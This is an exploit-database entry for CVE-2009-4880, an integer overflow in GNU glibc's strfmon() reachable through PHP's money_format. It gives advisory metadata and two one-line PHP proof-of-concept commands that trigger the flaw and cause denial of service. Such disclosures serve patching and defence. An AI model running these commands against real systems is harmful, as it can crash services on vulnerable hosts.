[] NeoSense
E X P L O I T S
title author type platform port cve id

GNU glibc 2.x - 'strfmon()' Integer Overflow

Author: Maksymilian Arciemowicz
type: dos
platform: linux
port: 
date_added: 2009-09-17 
date_updated: 2014-05-08 
verified: 1 
codes: CVE-2009-4880;OSVDB-65080 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/36443/info

GNU glibc is prone to an integer-overflow weakness.

An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

GNU glibc 2.10.1 and prior are vulnerable.

The following proof-of-concept commands are available:

php -r 'money_format("%.1073741821i",1);'
php -r 'money_format("%.1343741821i",1);'
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.